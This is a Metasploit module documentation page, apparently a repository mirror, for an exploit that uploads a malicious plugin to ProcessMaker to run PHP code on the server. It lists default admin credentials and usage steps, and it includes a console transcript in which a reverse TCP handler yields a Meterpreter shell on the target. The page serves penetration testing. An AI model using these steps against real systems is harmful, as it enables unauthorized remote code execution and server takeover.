dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
metasploit-framework/documentation/modules/exploit/multi/http/processmaker_plugin_upload.md

3.3 KiB
Raw Permalink Blame History

Description

This module will generate and upload a plugin to ProcessMaker resulting in execution of PHP code as the web server user.

Credentials for a valid user account with Administrator roles is required to run this module.

Vulnerable Application

ProcessMaker workflow management software allows public and private organizations to automate document intensive, approval-based processes across departments and systems. Business users and process experts with no programming experience can design and run workflows.

This module has been tested successfully on ProcessMaker versions:

  • 1.6-4276, 2.0.23, 3.0 RC 1, 3.2.0, 3.2.1 on Windows 7 SP 1
  • 3.2.0 on Debian Linux 8

Source and Installers:

Verification Steps

  1. Start msfconsole
  2. Do: use exploit/multi/http/processmaker_plugin_upload
  3. Do: set RHOST [IP]
  4. Do: set USERNAME [USERNAME] (default: admin)
  5. Do: set PASSWORD [PASSWORD] (default: admin)
  6. Do: set WORKSPACE [WORKSPACE] (default: workflow)
  7. Do: run
  8. You should get a session

Options

Username

The username for a ProcessMaker user with Administrator roles (default: admin).

Password

The password for the ProcessMaker user (default: admin).

The default password for the admin user is admin on ProcessMaker versions 1.x and 2.x.

For ProcessMaker 3.x onwards, the default password is specified during installation and cannot be the same as the username.

However; when creating a new workspace a new user with Administrator roles is also created. The default username and password for the new user are admin and admin respectively.

Workspace

The ProcessMaker workspace for which the specified user has Administrator roles. (default: workflow)

Scenarios

msf > use exploit/multi/http/processmaker_plugin_upload 
msf exploit(processmaker_plugin_upload) > set rhost 172.16.191.202
rhost => 172.16.191.202
msf exploit(processmaker_plugin_upload) > set username admin
username => admin
msf exploit(processmaker_plugin_upload) > set password admin
password => admin
msf exploit(processmaker_plugin_upload) > set workspace sample
workspace => sample
msf exploit(processmaker_plugin_upload) > set rport 8080
rport => 8080
msf exploit(processmaker_plugin_upload) > run

[*] Started reverse TCP handler on 172.16.191.181:4444 
[*] Authenticating as user 'admin'
[+] 172.16.191.202:8080 Authenticated as user 'admin'
[*] 172.16.191.202:8080 Uploading plugin 'zqkMpDOiIlNEvhkNnV' (23552 bytes)
[*] Sending stage (33986 bytes) to 172.16.191.202
[*] Meterpreter session 1 opened (172.16.191.181:4444 -> 172.16.191.202:36592) at 2017-06-10 04:21:25 -0400
[+] Deleted ../../shared/sites/sample/files/input/zqkMpDOiIlNEvhkNnV-.tar
[+] Deleted ../../shared/sites/sample/files/input/zqkMpDOiIlNEvhkNnV.php
[+] Deleted ../../shared/sites/sample/files/input/zqkMpDOiIlNEvhkNnV/class.zqkMpDOiIlNEvhkNnV.php

meterpreter > getuid
Server username: user (1000)
meterpreter > sysinfo 
Computer    : debian
OS          : Linux debian 3.16.0-4-amd64 #1 SMP Debian 3.16.43-2 (2017-04-30) x86_64
Meterpreter : php/linux